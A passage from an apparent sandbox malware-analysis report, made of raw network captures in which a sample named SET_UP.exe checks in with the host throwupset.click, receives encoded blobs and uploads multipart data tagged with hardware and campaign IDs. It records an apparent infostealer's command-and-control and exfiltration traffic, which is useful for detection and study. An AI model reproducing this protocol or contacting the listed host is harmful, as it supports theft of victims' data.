                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bkobd59ooaSoMjeNA%2BzUyJ4z%2BGFIDSAQpxIrEWUPJRcHMdrBPp1PrGO%2BwOakZgR4GdeT4OLVyNBiyD2l8Y0KCxbK3RW878EYPiSFyi%2F7gwdtAlxQ5JW1CFBlfFA8Z5IxXgg0"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb3d5e8dcc1424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1565&rtt_var=603&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3051&recv_bytes=907&delivery_rate=2688766&cwnd=249&unsent_bytes=0&cid=06dbae1aab0f010f&ts=582&x=0"
                                                                                                          2025-01-01 16:20:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                          Data Ascii: 2ok
                                                                                                          2025-01-01 16:20:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449737104.21.112.14431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:15 UTC264OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 80
                                                                                                          Host: throwupset.click
                                                                                                          2025-01-01 16:20:15 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                          2025-01-01 16:20:16 UTC1119INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 01 Jan 2025 16:20:16 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=e1knbp006npv1cfl1c0scqqece; expires=Sun, 27 Apr 2025 10:06:55 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sJwByhj6vMqrhIzxJqBytWJFGcxtIUsxt%2BxVaTxXJAYjvuv60%2BAgL2LvjbQgktmENF4os7xj7MHgRdum7XY7EYNDqzzU8o2lurRyd06D9Qn8tbxbyo9CQtNTA4BhF4K7GpnK"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb3d5eead1b727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1934&rtt_var=746&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3050&recv_bytes=980&delivery_rate=2170465&cwnd=233&unsent_bytes=0&cid=f7c1d7131944979b&ts=491&x=0"
                                                                                                          2025-01-01 16:20:16 UTC250INData Raw: 34 36 66 0d 0a 68 4c 57 2f 68 73 6c 6e 46 53 59 4d 36 44 4c 54 4e 65 36 6e 38 34 41 73 5a 6e 2b 70 71 63 75 57 66 2b 4a 2f 2b 7a 6e 38 75 65 50 2f 6c 38 6d 6b 38 31 4d 35 42 48 2b 4e 45 4f 6c 54 6a 38 75 41 35 51 42 45 48 73 32 4c 38 66 41 65 6a 67 79 65 46 64 37 50 6a 71 61 50 32 65 65 6c 46 48 41 4b 4c 6f 31 4b 38 51 2b 31 33 4e 48 6c 51 6b 52 46 69 38 79 68 39 42 36 4f 48 5a 70 53 6b 38 6d 50 35 39 33 54 34 61 45 43 64 6b 4a 74 68 46 2b 32 55 49 76 47 6d 65 35 46 43 78 66 45 69 2b 65 30 47 70 68 64 77 52 75 78 33 4a 66 6c 2b 4e 37 31 6f 6b 56 6f 43 6e 66 4b 56 37 30 58 31 49 57 53 35 55 34 4b 47 63 33 43 6f 2f 34 58 68 68 79 66 55 34 7a 51 68 65 7a 64 33 65 4b 67 43 48 39 57 59 49 35 59 76 56 61 42 78 74 47 73 44 67 4d 46 69 35 50 70 70
                                                                                                          Data Ascii: 46fhLW/hslnFSYM6DLTNe6n84AsZn+pqcuWf+J/+zn8ueP/l8mk81M5BH+NEOlTj8uA5QBEHs2L8fAejgyeFd7PjqaP2eelFHAKLo1K8Q+13NHlQkRFi8yh9B6OHZpSk8mP593T4aECdkJthF+2UIvGme5FCxfEi+e0GphdwRux3Jfl+N71okVoCnfKV70X1IWS5U4KGc3Co/4XhhyfU4zQhezd3eKgCH9WYI5YvVaBxtGsDgMFi5Ppp
                                                                                                          2025-01-01 16:20:16 UTC892INData Raw: 79 2b 44 44 49 68 4f 6b 38 75 48 70 73 69 54 2f 65 73 43 65 77 51 32 79 6c 69 39 57 59 6e 47 6e 75 56 50 42 41 2f 45 79 36 72 38 46 59 51 58 6c 6c 53 52 31 59 76 68 33 39 54 6a 70 41 4a 2f 51 6d 47 4a 45 50 38 58 69 39 33 52 75 67 34 6b 44 63 6a 49 76 66 6b 4d 77 41 4c 58 51 74 37 63 6a 61 61 50 6e 65 4b 6c 42 48 70 45 66 49 4a 62 75 6c 4b 65 7a 70 6a 76 51 77 51 51 77 63 53 71 39 42 71 4b 46 35 5a 52 6d 74 61 4d 34 4e 66 64 70 4f 56 46 63 46 77 75 30 68 43 53 55 70 7a 43 6e 66 51 4d 50 6c 33 55 68 62 43 30 47 6f 78 64 77 52 75 57 33 6f 4c 6c 33 4e 4c 6e 6f 77 35 6c 52 48 79 4d 58 62 52 46 69 73 43 66 36 45 30 57 46 38 58 4e 71 76 30 57 69 52 69 65 58 39 36 56 77 65 48 50 6e 62 7a 72 4a 48 70 50 59 6f 42 48 73 52 65 54 69 34 69 69 53 51 68 64 6b 34 75 74
                                                                                                          Data Ascii: y+DDIhOk8uHpsiT/esCewQ2yli9WYnGnuVPBA/Ey6r8FYQXllSR1Yvh39TjpAJ/QmGJEP8Xi93Rug4kDcjIvfkMwALXQt7cjaaPneKlBHpEfIJbulKezpjvQwQQwcSq9BqKF5ZRmtaM4NfdpOVFcFwu0hCSUpzCnfQMPl3UhbC0GoxdwRuW3oLl3NLnow5lRHyMXbRFisCf6E0WF8XNqv0WiRieX96VweHPnbzrJHpPYoBHsReTi4iiSQhdk4ut
                                                                                                          2025-01-01 16:20:16 UTC1369INData Raw: 33 36 31 39 0d 0a 61 33 59 75 32 75 67 54 41 47 70 55 62 78 70 75 4f 36 64 6a 56 35 4b 6f 42 65 6b 42 76 68 31 79 34 56 49 44 4a 6d 65 39 43 41 42 4c 44 77 36 72 38 44 34 34 54 6e 31 32 65 33 73 47 6f 6c 39 72 38 36 31 30 33 59 47 43 64 52 4c 6f 56 75 63 61 66 37 45 6b 53 58 64 53 46 73 4c 51 61 6a 46 33 42 47 35 44 57 69 75 72 51 31 4f 57 6f 42 58 31 4b 59 59 42 59 75 56 65 42 78 4a 72 71 53 41 6b 57 78 4d 53 75 2f 42 36 4d 47 4a 52 59 33 70 58 42 34 63 2b 64 76 4f 73 67 65 55 64 2f 6d 78 4b 45 56 49 4c 4c 6c 76 51 4f 47 31 50 53 69 36 37 34 58 64 68 64 6b 31 79 5a 33 34 7a 73 31 4e 6e 67 70 67 70 2b 54 57 65 59 57 72 31 5a 6e 73 69 62 35 30 41 49 47 4d 54 4c 71 50 55 54 69 68 62 5a 46 64 37 63 6d 61 61 50 6e 63 75 6d 46 57 56 4f 5a 5a 73 53 68 46 53 43
                                                                                                          Data Ascii: 3619a3Yu2ugTAGpUbxpuO6djV5KoBekBvh1y4VIDJme9CABLDw6r8D44Tn12e3sGol9r86103YGCdRLoVucaf7EkSXdSFsLQajF3BG5DWiurQ1OWoBX1KYYBYuVeBxJrqSAkWxMSu/B6MGJRY3pXB4c+dvOsgeUd/mxKEVILLlvQOG1PSi674Xdhdk1yZ34zs1Nngpgp+TWeYWr1Znsib50AIGMTLqPUTihbZFd7cmaaPncumFWVOZZsShFSC
                                                                                                          2025-01-01 16:20:16 UTC1369INData Raw: 34 72 48 74 33 42 36 65 74 54 6d 56 32 65 56 39 36 44 77 65 7a 62 32 65 65 6e 44 48 74 4a 62 34 35 58 76 46 4f 4d 77 35 66 6e 54 77 38 56 78 38 53 6a 2b 42 6d 4d 46 4a 39 58 6e 64 69 48 70 70 6d 64 34 37 4e 46 4c 77 52 50 68 31 75 39 56 34 2f 55 6c 71 49 41 52 42 50 4e 79 2b 6d 73 43 35 41 4b 6e 6b 54 51 77 73 48 68 32 35 32 38 36 77 39 6c 51 57 43 4f 57 72 52 54 67 4d 2b 52 35 31 77 4d 47 38 7a 48 6f 66 45 53 68 68 69 55 58 4a 58 59 6b 2f 54 55 32 65 71 6e 52 54 6b 45 61 5a 49 51 36 52 65 70 30 70 4c 79 53 41 64 64 31 49 57 77 74 42 71 4d 58 63 45 62 6e 74 57 4e 37 64 44 57 37 36 38 42 64 30 6c 6c 68 46 36 34 57 34 54 4a 6c 76 42 44 41 52 58 42 77 71 7a 34 45 49 4d 50 6d 6c 72 65 6c 63 48 68 7a 35 32 38 36 79 4a 45 63 30 33 4b 54 2f 39 4f 7a 4d 4b 64 6f
                                                                                                          Data Ascii: 4rHt3B6etTmV2eV96Dwezb2eenDHtJb45XvFOMw5fnTw8Vx8Sj+BmMFJ9XndiHppmd47NFLwRPh1u9V4/UlqIARBPNy+msC5AKnkTQwsHh25286w9lQWCOWrRTgM+R51wMG8zHofEShhiUXJXYk/TU2eqnRTkEaZIQ6Rep0pLySAdd1IWwtBqMXcEbntWN7dDW768Bd0llhF64W4TJlvBDARXBwqz4EIMPmlrelcHhz5286yJEc03KT/9OzMKdo
                                                                                                          2025-01-01 16:20:16 UTC1369INData Raw: 49 78 4b 4b 30 41 73 34 45 32 56 79 53 6d 39 6d 6d 30 4e 58 73 70 51 5a 78 54 32 4b 47 55 62 68 52 69 63 32 57 37 55 6b 4e 47 73 76 4e 75 2f 4d 51 69 52 32 53 55 70 54 66 67 4f 32 58 6b 36 53 73 48 54 63 63 4c 72 68 58 70 30 65 50 68 59 36 73 56 30 51 61 78 34 76 78 74 42 43 53 48 4a 78 4a 6d 74 53 4b 39 4e 7a 62 35 4b 34 58 63 45 68 6b 68 56 4f 35 57 6f 2f 4e 67 2b 4a 44 42 41 2f 5a 7a 61 4c 36 58 63 35 64 6e 6b 50 65 67 38 48 58 77 4e 61 6b 74 45 74 75 42 47 6d 47 45 4f 6b 58 6a 38 2b 63 37 46 77 41 47 38 44 49 70 2f 77 59 69 42 6d 54 56 70 48 51 69 2b 2f 66 33 65 75 75 44 58 78 43 59 49 74 57 76 56 72 4d 69 39 48 6c 56 6b 52 46 69 2b 79 7a 2b 52 75 58 44 4b 78 63 6e 6f 72 42 2b 5a 6e 45 70 4b 77 4a 4e 78 77 75 68 31 79 37 57 6f 6e 42 6d 65 56 4e 42 52
                                                                                                          Data Ascii: IxKK0As4E2VySm9mm0NXspQZxT2KGUbhRic2W7UkNGsvNu/MQiR2SUpTfgO2Xk6SsHTccLrhXp0ePhY6sV0Qax4vxtBCSHJxJmtSK9Nzb5K4XcEhkhVO5Wo/Ng+JDBA/ZzaL6Xc5dnkPeg8HXwNaktEtuBGmGEOkXj8+c7FwAG8DIp/wYiBmTVpHQi+/f3euuDXxCYItWvVrMi9HlVkRFi+yz+RuXDKxcnorB+ZnEpKwJNxwuh1y7WonBmeVNBR
                                                                                                          2025-01-01 16:20:16 UTC1369INData Raw: 2b 46 33 59 58 5a 64 57 6d 4e 71 41 37 74 2f 64 34 71 45 42 64 45 31 74 6a 56 6d 33 58 49 2f 50 6e 75 56 49 41 42 33 41 7a 4b 66 79 47 49 73 55 32 52 58 65 33 4a 6d 6d 6a 35 33 43 69 42 64 6c 64 6d 43 4a 53 2f 46 49 77 74 7a 52 35 55 4a 45 52 59 76 41 6f 66 73 50 68 52 53 52 58 35 66 62 68 65 7a 61 32 75 53 75 43 48 4a 41 59 49 35 58 73 56 75 44 77 70 6e 74 53 67 51 53 69 34 58 70 38 77 58 41 52 64 6c 37 6c 63 32 67 36 4e 7a 50 70 4c 52 4c 62 67 52 70 68 68 44 70 46 34 4c 4d 6b 4f 70 41 43 42 58 50 32 61 6e 2f 46 49 38 63 6c 6c 75 64 32 6f 76 75 78 64 76 6b 6f 41 31 77 54 47 71 45 51 72 42 59 7a 49 76 52 35 56 5a 45 52 59 76 36 76 2f 4d 61 6a 31 2b 77 58 49 58 61 69 2b 58 63 30 61 53 30 53 32 34 45 61 59 59 51 36 52 65 42 79 5a 7a 6d 58 41 67 64 79 38 4b
                                                                                                          Data Ascii: +F3YXZdWmNqA7t/d4qEBdE1tjVm3XI/PnuVIAB3AzKfyGIsU2RXe3Jmmj53CiBdldmCJS/FIwtzR5UJERYvAofsPhRSRX5fbheza2uSuCHJAYI5XsVuDwpntSgQSi4Xp8wXARdl7lc2g6NzPpLRLbgRphhDpF4LMkOpACBXP2an/FI8cllud2ovuxdvkoA1wTGqEQrBYzIvR5VZERYv6v/Maj1+wXIXai+Xc0aS0S24EaYYQ6ReByZzmXAgdy8K
                                                                                                          2025-01-01 16:20:16 UTC1369INData Raw: 78 4f 63 57 70 4c 52 68 75 6a 46 33 4f 36 6e 42 48 42 44 5a 5a 68 62 6f 31 79 45 78 70 2f 71 52 77 51 54 79 38 71 6b 39 46 33 4f 58 5a 35 44 33 6f 50 42 77 2f 54 4b 38 71 46 48 56 46 4e 34 67 46 65 39 51 59 66 45 6b 76 52 44 46 46 32 46 69 37 6a 7a 44 4d 42 46 6a 30 75 4a 33 4a 36 6f 7a 70 33 6a 70 30 55 76 42 47 57 46 58 72 78 63 69 4d 79 55 36 6b 30 42 47 4d 48 48 70 66 55 56 69 52 65 63 58 70 6a 52 67 75 6a 59 33 4f 69 76 44 48 6c 4e 4c 73 51 51 74 6b 2f 4d 6e 64 48 55 58 67 4d 46 78 74 76 72 78 68 36 52 44 49 78 57 6a 74 33 44 79 64 54 52 35 36 34 43 5a 77 52 78 78 45 6e 78 55 49 43 46 79 61 4a 4f 41 42 48 49 7a 4b 66 37 45 49 38 61 6b 6c 53 55 31 5a 50 70 30 74 58 6f 6f 77 68 6c 54 6d 53 59 57 62 68 61 67 73 32 44 34 51 35 4b 58 63 7a 54 36 61 78 64
                                                                                                          Data Ascii: xOcWpLRhujF3O6nBHBDZZhbo1yExp/qRwQTy8qk9F3OXZ5D3oPBw/TK8qFHVFN4gFe9QYfEkvRDFF2Fi7jzDMBFj0uJ3J6ozp3jp0UvBGWFXrxciMyU6k0BGMHHpfUViRecXpjRgujY3OivDHlNLsQQtk/MndHUXgMFxtvrxh6RDIxWjt3DydTR564CZwRxxEnxUICFyaJOABHIzKf7EI8aklSU1ZPp0tXoowhlTmSYWbhags2D4Q5KXczT6axd
                                                                                                          2025-01-01 16:20:16 UTC1369INData Raw: 57 2b 30 4a 66 6e 32 74 62 6f 6c 54 74 69 52 32 43 45 56 36 64 47 7a 49 76 52 37 51 35 63 4a 49 75 44 36 63 74 54 77 41 58 5a 41 39 37 75 67 75 6a 5a 32 76 4b 36 53 46 64 50 65 49 74 64 75 6c 76 4f 78 4a 7a 79 53 55 52 54 69 38 33 70 72 45 33 4f 58 5a 31 4b 33 6f 50 52 74 49 79 49 74 2f 78 56 4a 56 73 67 6b 78 43 6e 46 39 53 58 33 36 4a 63 52 45 57 4c 6a 4b 72 6d 44 34 59 65 6a 31 6a 5a 35 62 2f 47 33 4e 48 6e 70 77 52 77 42 43 44 4b 58 2f 45 50 74 59 57 53 38 46 78 4c 44 4e 33 47 75 66 4e 52 69 41 79 55 56 39 36 56 77 61 72 54 31 75 69 75 41 6d 63 4c 66 4a 70 62 76 55 48 41 77 59 4f 69 41 45 51 4d 77 4d 53 37 2b 68 72 50 44 49 39 57 6a 74 69 45 34 5a 76 56 39 61 59 4a 4e 77 6f 75 6e 31 75 39 55 59 48 51 33 76 4e 59 42 77 76 4d 68 36 48 6c 45 49 78 64 70
                                                                                                          Data Ascii: W+0Jfn2tbolTtiR2CEV6dGzIvR7Q5cJIuD6ctTwAXZA97ugujZ2vK6SFdPeItdulvOxJzySURTi83prE3OXZ1K3oPRtIyIt/xVJVsgkxCnF9SX36JcREWLjKrmD4Yej1jZ5b/G3NHnpwRwBCDKX/EPtYWS8FxLDN3GufNRiAyUV96VwarT1uiuAmcLfJpbvUHAwYOiAEQMwMS7+hrPDI9WjtiE4ZvV9aYJNwoun1u9UYHQ3vNYBwvMh6HlEIxdp
                                                                                                          2025-01-01 16:20:16 UTC1369INData Raw: 42 76 70 66 6f 35 36 55 4c 63 46 4a 2f 78 33 61 79 55 49 72 47 6e 2f 56 66 52 46 4f 4c 7a 65 6d 73 54 38 35 64 6e 55 72 65 67 39 47 30 6a 49 69 33 2f 46 55 6c 57 79 43 54 45 4b 63 58 31 4a 62 66 6f 6c 78 45 52 59 75 4d 70 2f 6b 63 67 78 4f 61 53 59 7a 64 67 76 44 55 6d 74 71 56 49 48 70 4a 61 34 52 58 6a 32 6d 74 7a 34 48 76 51 51 4d 6a 39 66 79 34 38 77 33 43 4f 35 70 4e 6e 5a 76 50 70 73 2b 64 76 4f 73 6b 66 56 52 6a 68 56 66 78 47 63 7a 42 30 62 6f 4f 49 52 44 47 7a 71 66 7a 58 36 45 58 69 56 61 52 33 4d 47 6f 6c 39 47 6b 38 30 56 32 54 6e 36 48 58 37 59 62 69 39 2b 57 6f 67 42 45 45 34 75 54 36 66 55 58 6b 42 43 57 58 4e 4c 64 6a 2b 69 58 77 71 71 79 52 57 45 45 4e 74 6b 65 38 55 58 4d 6e 64 47 6c 51 41 6b 63 79 4d 57 71 35 67 2b 47 48 6f 39 59 32 65
                                                                                                          Data Ascii: Bvpfo56ULcFJ/x3ayUIrGn/VfRFOLzemsT85dnUreg9G0jIi3/FUlWyCTEKcX1JbfolxERYuMp/kcgxOaSYzdgvDUmtqVIHpJa4RXj2mtz4HvQQMj9fy48w3CO5pNnZvPps+dvOskfVRjhVfxGczB0boOIRDGzqfzX6EXiVaR3MGol9Gk80V2Tn6HX7Ybi9+WogBEE4uT6fUXkBCWXNLdj+iXwqqyRWEENtke8UXMndGlQAkcyMWq5g+GHo9Y2e


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449738104.21.112.14431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:16 UTC282OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=HISKUTTBY8PS7D5S4E
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 18164
                                                                                                          Host: throwupset.click
                                                                                                          2025-01-01 16:20:16 UTC15331OUTData Raw: 2d 2d 48 49 53 4b 55 54 54 42 59 38 50 53 37 44 35 53 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 33 31 45 33 35 46 46 37 38 34 43 41 43 42 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 48 49 53 4b 55 54 54 42 59 38 50 53 37 44 35 53 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 49 53 4b 55 54 54 42 59 38 50 53 37 44 35 53 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52
                                                                                                          Data Ascii: --HISKUTTBY8PS7D5S4EContent-Disposition: form-data; name="hwid"6731E35FF784CACBC2833675FF85F83D--HISKUTTBY8PS7D5S4EContent-Disposition: form-data; name="pid"2--HISKUTTBY8PS7D5S4EContent-Disposition: form-data; name="lid"hRjzG3--ELVIR
                                                                                                          2025-01-01 16:20:16 UTC2833OUTData Raw: 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9
                                                                                                          Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
                                                                                                          2025-01-01 16:20:17 UTC1133INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 01 Jan 2025 16:20:17 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=d4l4ebr3gi4tj5civ9rg0ovcmr; expires=Sun, 27 Apr 2025 10:06:56 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lf5GS4%2BbhuQKbwC3ifr2PjHCJM6iYxGPvLlYbDKpqNMoqPV%2F8sNcKbTeX%2FLqU1UW6auoPpbJ%2FjoT3A4dWXA%2FJ4WcMFlfGAwopA297f4iNI2qt%2FnsVSFUEnbb6wtRI32tSN%2BZ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb3d5f57bfc729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1897&min_rtt=1895&rtt_var=714&sent=10&recv=21&lost=0&retrans=0&sent_bytes=3051&recv_bytes=19126&delivery_rate=2291993&cwnd=170&unsent_bytes=0&cid=d46f9e73f09a773d&ts=758&x=0"
                                                                                                          2025-01-01 16:20:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2025-01-01 16:20:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449739104.21.112.14431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:18 UTC273OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=8MGEHNKGXA
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 8737
                                                                                                          Host: throwupset.click
                                                                                                          2025-01-01 16:20:18 UTC8737OUTData Raw: 2d 2d 38 4d 47 45 48 4e 4b 47 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 33 31 45 33 35 46 46 37 38 34 43 41 43 42 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 38 4d 47 45 48 4e 4b 47 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4d 47 45 48 4e 4b 47 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 38 4d 47 45 48 4e 4b 47 58 41 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                          Data Ascii: --8MGEHNKGXAContent-Disposition: form-data; name="hwid"6731E35FF784CACBC2833675FF85F83D--8MGEHNKGXAContent-Disposition: form-data; name="pid"2--8MGEHNKGXAContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--8MGEHNKGXAContent
                                                                                                          2025-01-01 16:20:18 UTC1123INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 01 Jan 2025 16:20:18 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=u3cmqq3u4sulum1kmkj2gsrsiq; expires=Sun, 27 Apr 2025 10:06:57 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iKmhi3YHfaomNu7MIhcbUuwUVcoOtTYRMcBchD%2F80FiqtAA4hYyyB8uYJYZvfgeOLQm1izEyV5BEOK7Pd84xeOI6RHLs1%2FTEuM7Ep8Psz9npFD1WZ3MG9P1ZnJNlH%2FypoJZZ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb3d5fd98e343b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1585&rtt_var=599&sent=9&recv=15&lost=0&retrans=0&sent_bytes=3050&recv_bytes=9668&delivery_rate=2727272&cwnd=204&unsent_bytes=0&cid=0df9deb3fa919e3a&ts=760&x=0"
                                                                                                          2025-01-01 16:20:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
